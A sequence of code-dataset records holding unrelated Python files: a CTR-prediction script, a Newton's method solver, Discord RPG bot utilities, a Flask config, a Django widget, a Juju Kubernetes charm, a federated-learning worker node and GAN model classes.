r2\n self.rs1 = rs1\n self.rs2 = rs2\n self.pred = pred\n\n self.accuracy = accuracy\n self.loss = loss\n self.train = train\n self.l2_reg_loss = l2_reg_loss\n","sub_path":"drlhp/reward_predictor.py","file_name":"reward_predictor.py","file_ext":"py","file_size_in_byte":15847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614839678","text":"import pandas as pd\nimport numpy as np\n\nimport pickle\n\nfrom sklearn.model_selection import ParameterGrid\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import metrics\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\n# Train Valid\ntrain = pd.read_csv('train.csv',encoding='cp932')\nid_date_max = train[['delivery_id','user_id','date']].groupby('user_id').max()['delivery_id']\nTrain = train.set_index('delivery_id').drop(id_date_max,axis=0)\nValid = train.set_index('delivery_id').loc[id_date_max]\n# Test\nTest = pd.read_csv('test.csv',encoding='cp932')\n\ndef get_data(df):\n df_ = df.drop(['date', 'user_id'],axis=1)\n\n gender_dummis = pd.get_dummies(df_['gender'],prefix='gender',drop_first=True)\n age_dummies = pd.get_dummies(df_['age'],prefix='gender')\n #age_dummies = df_['age'].replace({'20代':2,'40代':4,'30代':3,'20歳未満':1,'50代以上':5})\n pre_dummies = pd.get_dummies(df_['prefectures'],prefix='prec')\n \n df_2 = df_.drop(['gender', 'age', 'prefectures'],axis=1)\n df_2['gender'] = gender_dummis\n #df_2['age'] = age_dummies\n df_2 = pd.concat([df_2,age_dummies],axis=1)\n df_2 = pd.concat([df_2,pre_dummies],axis=1)\n \n ratio_total = 
(df_2['prev_total_click']/df_2['prev_total_cnt']).replace(0,-1).fillna(0)\n ratio_eco = (df_2['prev_economy_click']/df_2['prev_economy_cnt']).replace(0,-1).fillna(0)\n ratio_pol = (df_2['prev_politics_click']/df_2['prev_politics_cnt']).replace(0,-1).fillna(0)\n ratio_soc = (df_2['prev_society_click']/df_2['prev_society_cnt']).replace(0,-1).fillna(0)\n ratio_spo = (df_2['prev_sport_click']/df_2['prev_sport_cnt']).replace(0,-1).fillna(0)\n ratio_ent = (df_2['prev_entertainment_click']/df_2['prev_entertainment_cnt']).replace(0,-1).fillna(0)\n \n df_2['ratio_total'] = ratio_total\n df_2['ratio_eco'] = ratio_eco\n df_2['ratio_pol'] = ratio_pol\n df_2['ratio_soc'] = ratio_soc\n df_2['ratio_spo'] = ratio_spo\n df_2['ratio_ent'] = ratio_ent\n return df_2\ndef delete_type(df,col):\n df_ = df[(df['type']=='%s'%col)]\n return df_.drop('type',axis=1)\ndef under_sample(df):\n df0 = df[(df['click_flg']==0)]\n df1 = df[(df['click_flg']==1)]\n df0_ = df0.sample(len(df1))\n return pd.concat([df0_,df1])##アンダーサンプルしていない\n\n\nTrain2 = get_data(Train)\nValid2 = get_data(Valid)\n#Train 最終データセット\ntr_eco = delete_type(Train2,col='経済')\ntr_ent = delete_type(Train2,col='エンタメ')\ntr_spo = delete_type(Train2,col='スポーツ')\ntr_pol = delete_type(Train2,col='政治')\ntr_soc = delete_type(Train2,col='社会')\n\ntr_eco_u = under_sample(tr_eco)\ntr_ent_u = under_sample(tr_ent)\ntr_spo_u = under_sample(tr_spo)\ntr_pol_u = under_sample(tr_pol)\ntr_soc_u = under_sample(tr_soc)\n\n\n#Valid 最終データセット\nva_eco = delete_type(Valid2,col='経済')\nva_ent = delete_type(Valid2,col='エンタメ')\nva_spo = delete_type(Valid2,col='スポーツ')\nva_pol = delete_type(Valid2,col='政治')\nva_soc = delete_type(Valid2,col='社会')\n\nva_eco_u = under_sample(va_eco)\nva_ent_u = under_sample(va_ent)\nva_spo_u = under_sample(va_spo)\nva_pol_u = under_sample(va_pol)\nva_soc_u = under_sample(va_soc)\n\n\n#各typeごとの学習\ncols = ['eco','ent','spo','pol','soc']\nTrains = [tr_eco_u, tr_ent_u, tr_spo_u, tr_pol_u, tr_soc_u]\nVals = [va_eco_u, va_ent_u, va_spo_u, va_pol_u, va_soc_u]\n\n\nparam_grid = {\n 'penalty' : ['l2', 'l1','elasticnet'],\n 'C':[0.01,0.1,1,10,50,100],\n 'solver':['saga'],\n 'l1_ratio':[0.5]\n }\n\nparam_dicts = list(ParameterGrid(param_grid))\nfor (i,(col,tr,va)) in enumerate(zip(cols,Trains,Vals)):\n #train\n y_tr = tr['click_flg'].values\n x_tr = tr.drop('click_flg',axis=1).values\n #val\n y_va = va['click_flg'].values\n x_va = va.drop('click_flg',axis=1).values\n \n #標準化\n ss = StandardScaler()\n ss.fit(x_tr)\n fn_ss = 'ss_%s.sav'%col\n pickle.dump(ss, open(fn_ss, 'wb'))\n \n x_tr_nor = ss.transform(x_tr)#train\n x_va_nor = ss.transform(x_va)#val\n \n #学習\n best_score = 0\n \n for params in param_dicts:\n model = LogisticRegression(**params)\n model.fit(x_tr_nor,y_tr)\n score_tmp = model.score(x_va_nor,y_va)\n if score_tmp > best_score:\n best_params = params\n \n \n \n model = LogisticRegression(**best_params)\n model.fit(x_tr_nor,y_tr)\n pred = model.predict(x_va_nor)\n fn_model = 'model_%s.sav'%col\n pickle.dump(model, open(fn_model, 'wb'))\n \n score = model.score(x_va_nor,y_va)\n \n fpr, tpr, thresholds = metrics.roc_curve(y_va, pred)\n auc = metrics.auc(fpr, tpr)\n \n Score = pd.DataFrame({'type':[col],'score':[auc]})\n if i == 0:\n Scores = Score\n else:\n Scores = pd.concat([Scores,Score])\n\n\n#標準化 関数\nloaded_ss_eco = pickle.load(open('ss_eco.sav', 'rb'))\nloaded_ss_ent = pickle.load(open('ss_ent.sav', 'rb'))\nloaded_ss_spo = pickle.load(open('ss_spo.sav', 'rb'))\nloaded_ss_pol = pickle.load(open('ss_pol.sav', 'rb'))\nloaded_ss_soc = 
pickle.load(open('ss_soc.sav', 'rb'))\n\n#学習モデル\nloaded_model_eco = pickle.load(open('model_eco.sav', 'rb'))\nloaded_model_ent = pickle.load(open('model_ent.sav', 'rb'))\nloaded_model_spo = pickle.load(open('model_spo.sav', 'rb'))\nloaded_model_pol = pickle.load(open('model_pol.sav', 'rb'))\nloaded_model_soc = pickle.load(open('model_soc.sav', 'rb'))\n\n\n#テスト予測\nTest2 = get_data(Test)\n\ntest_eco_nor = loaded_ss_eco.transform(Test2.values)\ntest_ent_nor = loaded_ss_ent.transform(Test2.values)\ntest_spo_nor = loaded_ss_spo.transform(Test2.values)\ntest_pol_nor = loaded_ss_pol.transform(Test2.values)\ntest_soc_nor = loaded_ss_soc.transform(Test2.values)\n\nproba_eco = loaded_model_eco.predict_proba(test_eco_nor)[:,1]\nproba_ent = loaded_model_ent.predict_proba(test_ent_nor)[:,1]\nproba_spo = loaded_model_spo.predict_proba(test_spo_nor)[:,1]\nproba_pol = loaded_model_pol.predict_proba(test_pol_nor)[:,1]\nproba_soc = loaded_model_soc.predict_proba(test_soc_nor)[:,1]\n\ndf_probs = pd.DataFrame({'経済':proba_eco,'エンタメ':proba_ent,'スポーツ':proba_spo,'政治':proba_pol,'社会':proba_soc})\n\n\nPros = []\nTypes = []\nfor idx in df_probs.index:\n pros = df_probs.loc[idx]\n max_val = pros.max()\n pros = df_probs.loc[idx]\n Pros.append(max_val)\n types = pros[(pros==max_val)].index[0]\n Types.append(types)\n\n# submit\nsubmit = Test[['date','user_id']]\nsubmit['type'] = Types\nsubmit['probability'] = Pros\nsubmit.to_csv('answer_test_ver01.tsv', sep = '\\t', index=False, encoding='utf-8')","sub_path":"CTR_prediction.py","file_name":"CTR_prediction.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470448871","text":"import pandas as pd\nimport math as m\nimport sympy as s\n\n(p0 , TOL , N) = (-0.5 , 0.00001 , 30)\n\ndata = []\npd.options.display.float_format = \"{:,.7f}\".format\ndef f(x):\n return m.cos(m.pi * (x + 1) / 8) + 0.148 * x - 0.9062\n\ndef f_der(x0):\n x = s.Symbol('x')\n y = s.cos(s.pi * (x + 1) / 8) + 0.148 * x - 0.9062\n return float(s.diff(y , x).subs(x , x0))\n\n\ndef newtons(p0 , TOL , N):\n i = 1\n \n data.append([0 , p0, 10])\n\n while i <= N:\n p = p0 - (f(p0) / f_der(p0))\n\n data.append([i , p , abs(p - p0)])\n\n if(abs(p - p0) < TOL):\n print(\"solution is \" , round(p , 10) , \"after\" , i , \"iterations\")\n break\n\n i += 1\n\n p0 = p\n \n table = pd.DataFrame(data , columns = ['n' , 'pn' , 'relative error'])\n print(table.to_string(index = 0))\n\n if(i - 1 == N):\n print(\"Method failed after {} iterations\".format(N)) \n\n\nnewtons(p0 , TOL , N)","sub_path":"Single_variable/Newtons_method.py","file_name":"Newtons_method.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92221077","text":"from cogs.database import Database\n\nclass Ordenacao:\n\n @staticmethod\n def ordenacao_emboscada(party, horda, emboscador):\n ordem1 = []\n ordem2 = []\n quant1 = []\n quant2 = []\n for personagem in party:\n personagem_id = Database.personagem_id(personagem)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem1.append(personagem)\n quant1.append(agilidade)\n Ordenacao.insertion_sort(quant1, ordem1)\n for tipo, char in horda:\n if tipo == \"s\":\n shadow_id = Database.shadow_persona_id(char)\n atributos = Database.atributos_iniciais(shadow_id)\n agilidade = atributos[5]\n ordem2.append(char)\n 
quant2.append(agilidade)\n else:\n personagem_id = Database.personagem_id(char)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem2.append(personagem_id)\n quant2.append(agilidade)\n Ordenacao.insertion_sort(quant2, ordem2)\n if emboscador == \"party\":\n return ordem1 + ordem2\n else:\n return ordem2 + ordem1\n\n @staticmethod\n def ordenacao_disputa(party, horda):\n ordem = []\n quant = []\n for personagem in party:\n personagem_id = Database.personagem_id(personagem)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem.append(personagem)\n quant.append(agilidade)\n for tipo, char in horda:\n if tipo == \"s\":\n shadow_id = Database.shadow_persona_id(char)\n atributos = Database.atributos_iniciais(shadow_id)\n agilidade = atributos[5]\n else:\n personagem_id = Database.personagem_id(char)\n persona_id = Database.persona_equipada(personagem_id)\n atributos = Database.atributos(personagem_id, persona_id)\n agilidade = atributos[5]\n ordem.append(personagem_id)\n quant.append(agilidade)\n Ordenacao.insertion_sort(quant, ordem)\n return ordem\n\n @staticmethod\n def insertion_sort(arr, ordem):\n for i in range(1, len(arr)):\n key = arr[i]\n key2 = ordem[i]\n j = i-1\n while j >=0 and key < arr[j]:\n arr[j+1] = arr[j]\n ordem[j+1] = ordem[j]\n j -= 1\n arr[j+1] = key\n ordem[j+1] = key2\n\nclass Somatorio:\n\n @staticmethod\n def atributos_totais_personagem(personagem_id, atributos):\n atributos_soma = Database.atributos_total(\"soma\", personagem_id)\n atributos_porcent = Database.atributos_total(\"porcent\", personagem_id)\n for i in range(len(atributos)):\n a = atributos[i] + atributos_soma[i]\n p = (atributos_porcent[i]/100) * a\n if atributos_soma[i] > 0:\n atributos[i] += int(a+p)\n else:\n atributos[i] += int(p)\n return atributos\n\nclass Reparador:\n\n @staticmethod\n def valores_atributos(atributos):\n for i in range(len(atributos)):\n atributos[i] = atributos[i][1]\n return atributos\n\n @staticmethod\n def repara_lista(lista, indice):\n nova_lista = []\n for i in range(len(lista)):\n nova_lista.append(lista[i][indice])\n return nova_lista\n\n @staticmethod\n def repara_nome(texto):\n nome = \"\"\n for palavra in texto:\n nome += palavra + \" \"\n nome = nome[:-1]\n return nome\n\nclass Gerador:\n\n @staticmethod\n def gerador_campos(chaves, valores):\n campos = []\n for i in range(len(valores)):\n campo = (chaves[i], valores[i])\n campos.append(campo)\n return campos\n\n @staticmethod\n def gerador_texto(lista_item):\n texto = \"\"\n for elem, quant in lista_item:\n texto += f'{elem} x{quant}; '\n texto = texto[:-2]\n return texto\n\n @staticmethod\n def gerador_campos_fraquezas(ficha, tipo):\n campos_fraquezas = [\n (\"<:phys:790320130810839101>\", ficha[tipo][0][1]),\n (\"<:gun:790320131028287488>\", ficha[tipo][1][1]),\n (\"<:fire:790320130483421245>\", ficha[tipo][2][1]),\n (\"<:ice:790320130738356224>\", ficha[tipo][3][1]),\n (\"<:elec:790320130151809047>\", ficha[tipo][4][1]),\n (\"<:wind:790320130521169922>\", ficha[tipo][5][1]),\n (\"<:psy:790320130772566046>\", ficha[tipo][6][1]),\n (\"<:nuclear:790320130584084532>\", ficha[tipo][7][1]),\n (\"<:bless:790320130746744892>\", ficha[tipo][8][1]),\n (\"<:curse:790320130387214336>\", ficha[tipo][9][1]),\n (\"<:almighty:790320130297954374>\", ficha[tipo][10][1])\n ]\n return campos_fraquezas\n\n @staticmethod\n def 
gerador_campos_atributos(fool, atributos):\n campos = []\n if fool:\n campos = [\n (\"**St**\", f'+{atributos[2]}'),\n (\"**Ma**\", f'+{atributos[3]}'),\n (\"**En**\", f'+{atributos[4]}'),\n (\"**Ag**\", f'+{atributos[5]}'),\n (\"**Lu**\", f'+{atributos[6]}')\n ]\n else:\n campos = [\n (\"**HP**\", f'+{atributos[0]}'),\n (\"**SP**\", f'+{atributos[1]}'),\n (\"**St**\", f'+{atributos[2]}'),\n (\"**Ma**\", f'+{atributos[3]}'),\n (\"**En**\", f'+{atributos[4]}'),\n (\"**Ag**\", f'+{atributos[5]}'),\n (\"**Lu**\", f'+{atributos[6]}')\n ]\n return campos\n\nclass Mensageiro:\n\n @staticmethod\n def informacoes_personagem(nome):\n informacoes = {}\n personagem_id = Database.personagem_id(nome)\n persona_id = Database.persona_equipada(personagem_id)\n usuario = Database.discord_user(personagem_id)\n equips = Database.itens_equipados(personagem_id)\n meelee = equips[0]\n ranged = equips[1]\n armadura = equips[2]\n fraquezas = Database.fraquezas(persona_id)\n atributos = Database.atributos(personagem_id, persona_id)\n atributos_base = Reparador.valores_atributos(atributos)\n atributos_somados = Somatorio.atributos_totais_personagem(personagem_id, atributos_base)\n skills = Database.skills_id(personagem_id, persona_id)\n informacoes[\"usuario\"] = usuario\n informacoes[\"meelee\"] = meelee\n informacoes[\"ranged\"] = ranged\n informacoes[\"armadura\"] = armadura\n informacoes[\"fraquezas\"] = fraquezas\n informacoes[\"atributos\"] = atributos_somados\n informacoes[\"skills\"] = skills\n return informacoes\n\n @staticmethod\n def informacoes_shadow(nome):\n informacoes = {}\n shadow_id = Database.shadow_persona_id(nome)\n fraquezas = Database.fraquezas(shadow_id)\n atributos_base = Database.atributos_iniciais(shadow_id)\n atributos_somados = Reparador.valores_atributos(atributos_base)\n nivel = Database.nivel_persona(shadow_id)\n skills = Database.skills_shadow(shadow_id, nivel)\n informacoes[\"fraquezas\"] = fraquezas\n informacoes[\"skills\"] = skills\n informacoes[\"atributos\"] = atributos_somados\n return informacoes\n\n @staticmethod\n def info_armadura(armadura):\n valor_armadura = 0\n if armadura != None:\n valor_armadura = Database.valor_item(armadura)\n return valor_armadura\n\n @staticmethod\n def info_ranged(ranged):\n valor_arma = 0\n if ranged != None:\n valor_arma = Database.valor_item(ranged)\n return valor_arma\n\n @staticmethod\n def info_meelee(meelee):\n valor_arma = 0\n if meelee != None:\n valor_arma = Database.valor_item(meelee)\n return valor_arma","sub_path":"painel de controle/bot/cogs/utilitarios.py","file_name":"utilitarios.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"516369196","text":"import os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'question_app', 'question_app.db')\n\nWTF_CSRF_ENABLED = True\nSECRET_KEY = 'some mega-secret key'\n\nRECAPTCHA_PUBLIC_KEY = 'some non-secret public key'\nRECAPTCHA_PRIVATE_KEY = 'no one will know this key'","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311580132","text":"'''\nCreated on Mar 18, 2017\n\n@author: robertglassett\n'''\n\nfrom django.forms.widgets import Widget\nfrom django.utils.safestring import mark_safe, six\n\n\n\n''' \nthis will have mulitple MultiHiddenInput widgets for each element that's 
already part of the many to many field,\nthen will draw divs in two containing divs -- one for each element already part of the model, and another for anything that can be selected\n'''\n\nclass TwoColumnDraggableWidget(Widget):\n    codeTable = None\n\n    def __init__(self, attrs=None):\n        if attrs is not None:\n            self.codeTable = attrs.pop('codeTableType', None)\n        super(TwoColumnDraggableWidget, self).__init__(attrs=None)\n\n    def value_from_datadict(self, data, files, name):\n        # the submitted value is a single id or a comma-separated list of ids\n        fieldval = data.get(name)\n        if fieldval is not None:\n            if ',' in fieldval:\n                vallist = fieldval.split(\",\")\n            else:\n                vallist = [fieldval]\n            return vallist\n        else:\n            return None\n\n    def render(self, name, value, attrs=None):\n        # open the column of already-selected elements (generic markup: the original tag attributes were stripped from this snippet)\n        html = '<div class=\"selected\">'\n        # check to see if value is empty or not. if not, no need to create anything else.\n        # if it is, need to see what it is (assuming a collection of ageGroup records of some sort)\n        if self.codeTable is not None and isinstance(value, list):\n            for v in value:\n                try:\n                    if isinstance(v, six.text_type):\n                        e = self.codeTable.objects.get(id=int(v))\n                    else:\n                        e = self.codeTable.objects.get(id=v)\n                except Exception:\n                    e = None
                if e is not None:\n                    try:\n                        html += '<div class=\"draggable\">' + e.name + '</div>'\n                    except (AttributeError, TypeError):\n                        html += '<div class=\"draggable\">' + name + '</div>'\n        if value is not None and len(value) > 0:\n            try:\n                # hidden input named after the field, carrying the selected ids as the\n                # comma-separated string that value_from_datadict() parses back\n                html += '<input type=\"hidden\" name=\"' + name + '\" value=\"' + \",\".join(value) + '\">'\n            except (AttributeError, TypeError):\n                html += '<input type=\"hidden\" name=\"' + name + '\" value=\"' + \",\".join(str(v) for v in value) + '\">'\n        # end the selected column\n        html += \"</div>\"\n        # open the column of elements that can still be selected\n        html += '<div class=\"available\">'\n        # iterate over the records in the code table.\n        if self.codeTable is not None:\n            for e in self.codeTable.objects.all():\n                if value is None or e.id not in value:\n                    html += '<div class=\"draggable\">' + e.name + '</div>'\n\n        html += \"</div>
\"\n\n return mark_safe(html)\n\n\n \n \n \n \n \n\n ","sub_path":"portal/widgets/TwoColumnDraggableWidget.py","file_name":"TwoColumnDraggableWidget.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"230887827","text":"from charms.layer.caas_base import pod_spec_set\nfrom charms.reactive import when, when_not, when_any\nfrom charms.reactive.flags import set_flag, register_trigger\n\nfrom charmhelpers.core.hookenv import (\n log,\n metadata,\n config,\n application_name,\n)\nfrom charms import layer\n\n\nregister_trigger(when='layer.docker-resource.ubuntu-image.changed',\n clear_flag='k8scharm.configured')\n\n\n@when_any('layer.docker-resource.ubuntu-image.failed')\ndef waiting_for_image():\n \"\"\"Set status blocked\n\n Conditions:\n - ubuntu-image.failed\n \"\"\"\n layer.status.blocked('Failed fetching Ubuntu image')\n\n\n@when('layer.docker-resource.ubuntu-image.available')\n@when_not('k8scharm.configured')\ndef configure():\n \"\"\"Configure Ubuntu pod\n\n Conditions:\n - ubuntu-image.available\n - Not k8scharm.configured\n \"\"\"\n layer.status.maintenance('Configuring ubuntu container')\n\n spec = make_pod_spec()\n log('set pod spec:\\n{}'.format(spec))\n pod_spec_set(spec)\n\n set_flag('k8scharm.configured')\n\n\n@when('k8scharm.configured')\ndef set_k8scharm_active():\n \"\"\"Set k8scharm status active\n\n Conditions:\n - k8scharm.configured\n \"\"\"\n layer.status.active('ready')\n\n\ndef make_pod_spec():\n \"\"\"Make pod specification for Kubernetes\n\n Returns:\n pod_spec: Pod specification for Kubernetes\n \"\"\"\n md = metadata()\n cfg = config()\n image_info = layer.docker_resource.get_info('ubuntu-image')\n with open('reactive/spec_template.yaml') as spec_file:\n pod_spec_template = spec_file.read()\n\n app_name = application_name()\n\n data = {\n 'name': md.get('name'),\n 'docker_image_path': image_info.registry_path,\n 'docker_image_username': image_info.username,\n 'docker_image_password': image_info.password,\n 'application_name': app_name,\n }\n data.update(cfg)\n return pod_spec_template % data\n","sub_path":"charms/builds/k8scharm/reactive/k8scharm.py","file_name":"k8scharm.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"376689255","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport glob\nimport random\nfrom imblearn.over_sampling import SMOTENC,ADASYN\n# from collections import Counter\nimport imblearn\n\nfrom models import ANN_model\n\n\ndef img_augument(img,lab):\n img = tf.image.random_flip_left_right(img)\n # img = tf.image.random_flip_up_down(img)\n img = tf.image.random_brightness(img, 0.2)\n img = tf.image.random_hue(img,0.1)\n img = tf.image.random_contrast(img, 0.5, 2)\n return img, lab\n\n\n\ndef set_iid(y_train,x_train):\n\n orig_x = x_train.shape\n orig_y = y_train.shape\n # print(orig_x)\n # print(orig_y)\n\n flat_x = np.reshape(x_train, (orig_x[0], 32*32*3))\n flat_y = y_train\n\n strategy_dict = dict(zip([i for i in range(10)], [410 for i in range(10)]))\n\n\n x_resampled, y_resampled = SMOTENC(categorical_features= [i for i in range(10)], sampling_strategy=strategy_dict).fit_resample(flat_x, flat_y)\n\n nc = len(y_resampled)\n\n new_shape_x = (nc,32,32,3)\n new_shape_y = (nc,1)\n\n \n bal_x = np.reshape(x_resampled, new_shape_x)\n bal_y = np.reshape(y_resampled, new_shape_y)\n\n 
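    # x/y were flattened to 2-D for SMOTENC and reshaped back to (n, 32, 32, 3) image tensors above;\n    # the oversampled set targets 410 samples per class, as requested in strategy_dict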
# print(np.unique(bal_y,return_counts=True))\n\n return bal_y,bal_x\n\n # category_index=[]\n # for i in range(10):\n # index0 = np.where(y_train == i)\n # index = index0[0]\n # np.random.shuffle(index)\n # category_index.append(index)\n \n # min_cato=1000000\n\n # for x in category_index:\n # if min_cato>x.shape[0]:\n # min_cato=x.shape[0]\n\n # if min_cato==0:\n # return y_train,x_train\n\n # cat_i=np.concatenate([x[:min_cato] for x in category_index])\n\n # return y_train[cat_i],x_train[cat_i]\n\n\n\ndef node_training_process(index_path,shared_index,central_weight_path,local_epoch,batch_size=50,augment=False,local_iid=False,node_evl=False):\n '''\n 1. Get index and initial_weights from central,\n 2. Load & prepare the dataset accordingly,\n 3. Training,\n 4. Return weights to central\n * In reality, it doesn't need index from central, it can read all local data like glob.glob('data_dir')\n * Saving node weights locally can be a safe way if node have many data, but here we just neglect this\n '''\n g = tf.Graph()\n with g.as_default(): #tf.graph to solve memory leak\n\n # load & processing data\n (x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data() \n\n autotune=tf.data.experimental.AUTOTUNE\n\n # load index\n index1 = np.load(index_path) \n ori_traning = index1.shape[0] # node's own data size\n\n # assign node_evl_set (1/2)\n if node_evl:\n evl_p = index_path[:-9]+'evl_index.npy'\n evl_index = np.load(evl_p)\n x_test_n=x_test[evl_index]\n y_test_n=y_test[evl_index]\n node_evl_list = []\n total_node_evl_list = []\n for i in range(10):\n index0 = np.where(y_test_n == i)\n index = index0[0]\n x_evl=tf.data.Dataset.from_tensor_slices(x_test_n[index])\n y_evl=tf.data.Dataset.from_tensor_slices(y_test_n[index])\n node_evl_set = tf.data.Dataset.zip((x_evl, y_evl))\n node_evl_set = node_evl_set.repeat().batch(1).prefetch(buffer_size=autotune)\n total_node_evl = len(index)\n node_evl_list.append(node_evl_set)\n total_node_evl_list.append(total_node_evl)\n\n\n # if shared_index!=[]:\n # shared_test_index = np.array([0])\n # for x in shared_index:\n # b=np.load(x)\n # index1 = np.concatenate((index1, b))\n # shared_test_index = np.concatenate((shared_test_index, b))\n # shared_test_index = shared_test_index[1:]\n # x_test_shared=x_train[shared_test_index]\n # y_test_shared=y_train[shared_test_index]\n # x_shared_evl=tf.data.Dataset.from_tensor_slices(x_test_shared)\n # y_shared_evl=tf.data.Dataset.from_tensor_slices(y_test_shared)\n # shared_evl_set = tf.data.Dataset.zip((x_shared_evl, y_shared_evl))\n # shared_evl_set = shared_evl_set.repeat().batch(batch_size).prefetch(buffer_size=autotune)\n # total_shared_evl = shared_test_index.shape[0] ###################################\n\n\n x_train_i=x_train[index1]\n y_train_i=y_train[index1]\n\n print(np.unique(y_train_i,return_counts=True)) ##############################\n\n if -1 in index1:\n iii = [random.randint(0, 40000) for i in range(len(index1))]\n x_train_i=x_train[iii]\n iii = [random.randint(0, 40000) for i in range(len(index1))]\n y_train_i=y_train[iii]\n print(np.unique(y_train_i,return_counts=True)) ##############################\n\n\n buffer_size = x_train_i.shape[0]\n # total_traning=index1.shape[0]\n\n x_tr=tf.data.Dataset.from_tensor_slices(x_train_i)\n y_tr=tf.data.Dataset.from_tensor_slices(y_train_i)\n total_traning = len(x_train_i)\n\n if local_iid==True:\n y_train_i2 , x_train_i2 =set_iid(y_train_i,x_train_i)\n print(np.unique(y_train_i2,return_counts=True)) ##############################\n total_traning = 
len(x_train_i2)\n x_tr=tf.data.Dataset.from_tensor_slices(x_train_i2)\n y_tr=tf.data.Dataset.from_tensor_slices(y_train_i2)\n\n\n print(np.unique(y_train_i,return_counts=True)) ##############################\n train_set=tf.data.Dataset.zip((x_tr, y_tr))\n if augment==True:\n train_set=train_set.map(img_augument).shuffle(buffer_size,reshuffle_each_iteration=True).repeat().batch(batch_size).prefetch(buffer_size=autotune)\n else:\n train_set=train_set.shuffle(buffer_size,reshuffle_each_iteration=True).repeat().batch(batch_size).prefetch(buffer_size=autotune)\n\n\n # Training & save\n # THIS LINE SHOULD BE THE FIRST\n save_dir = index_path[:-9]\n\n model=ANN_model()\n model.load_weights(central_weight_path)\n\n\n # node_evl before training (2/2)\n if node_evl:\n filename = os.path.join(save_dir,'node_EVAL_before_training.txt')\n with open(filename,'a') as file_handle:\n for i in range(10):\n if total_node_evl_list[i]==0:\n file_handle.write('200')\n file_handle.write(' ')\n else:\n [loss, acc] = model.evaluate(node_evl_list[i],steps=total_node_evl_list[i]//1,verbose=0)\n file_handle.write(str(acc))\n file_handle.write(' ')\n file_handle.write('\\n')\n\n\n # # see if overtrained over the shared index\n # if shared_index!=[]:\n # [loss, acc]=model.evaluate(shared_evl_set,steps=total_shared_evl//batch_size,verbose=0)\n # filename = os.path.join(save_dir,'shared_EVAL.txt')\n # with open(filename,'a') as file_handle:\n # file_handle.write(str(loss))\n # file_handle.write(' ')\n # file_handle.write(str(acc))\n # file_handle.write('\\n')\n\n\n # test the loaded model to see if it's overtrainned? mention it's last epo's acc\n [self_loss, self_acc]=model.evaluate(train_set,steps=total_traning//batch_size,verbose=0)\n filename = os.path.join(save_dir,'self_EVAL.txt')\n with open(filename,'a') as file_handle:\n file_handle.write(str(self_loss))\n file_handle.write(' ')\n file_handle.write(str(self_acc))\n file_handle.write('\\n')\n\n\n history = model.fit(train_set,\n epochs=local_epoch,\n steps_per_epoch=total_traning//batch_size,\n verbose=0)\n\n # return model_weight \n model_weights=model.get_weights() \n\n del model\n\n # TODO: Change/add validation based on the split of data on the worker node -----------> save locally in worker nodes.\n # And compare this weighted average to current one (a centralized testing set)\n\n\n return model_weights,total_traning\n","sub_path":"Cifar10/FedSimuCode/vm_1c_smote/worker_node.py","file_name":"worker_node.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"56625906","text":"import torch\nfrom torch import nn\n\nfrom _layers import LinearBlock, Conv2dBlock, ResBlock\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_dim, config_dis):\n super(Discriminator, self).__init__()\n\n dim = config_dis['dim']\n norm = config_dis['norm']\n activation = config_dis['activ']\n n_layer = config_dis['n_layer']\n pad_type = config_dis['pad_type']\n self.num_scales = config_dis['num_scales']\n\n self.blocks = []\n for scale in range(self.num_scales):\n block = self.build_block(input_dim, dim // (2 ** scale), n_layer, norm, activation, pad_type)\n self.add_module('model_{}'.format(scale), block)\n\n def build_block(self, input_dim, dim, n_layer, norm, activation, pad_type):\n layers = []\n layers += [Conv2dBlock(input_dim, dim, kernel_size=4, stride=2, padding=1, norm='none', activation=activation, pad_type=pad_type)]\n for _ in range(n_layer - 2):\n layers += 
[Conv2dBlock(dim, dim * 2, kernel_size=4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)]\n dim *= 2\n layers += [Conv2dBlock(dim, 1, kernel_size=4, stride=2, padding=1, norm='none', activation='none', pad_type=pad_type)]\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n logits = []\n for scale in range(self.num_scales):\n model = getattr(self, \"model_{}\".format(scale))\n logits += [model(x)]\n x = nn.AvgPool2d(2)(x)\n return logits\n\n\nclass Generator(nn.Module):\n def __init__(self, input_dim, config_gen):\n super(Generator, self).__init__()\n\n dim = config_gen['dim']\n style_dim = config_gen['style_dim']\n self.mlp_dim = mlp_dim = config_gen['mlp_dim']\n n_res = config_gen['n_res']\n activation = config_gen['activ']\n n_downsample = config_gen['n_downsample']\n pad_type = config_gen['pad_type']\n\n self.enc_content = ContentEncoder(input_dim, dim, n_downsample, n_res, 'in', activation, pad_type)\n self.enc_style = StyleEncoder(input_dim, dim, 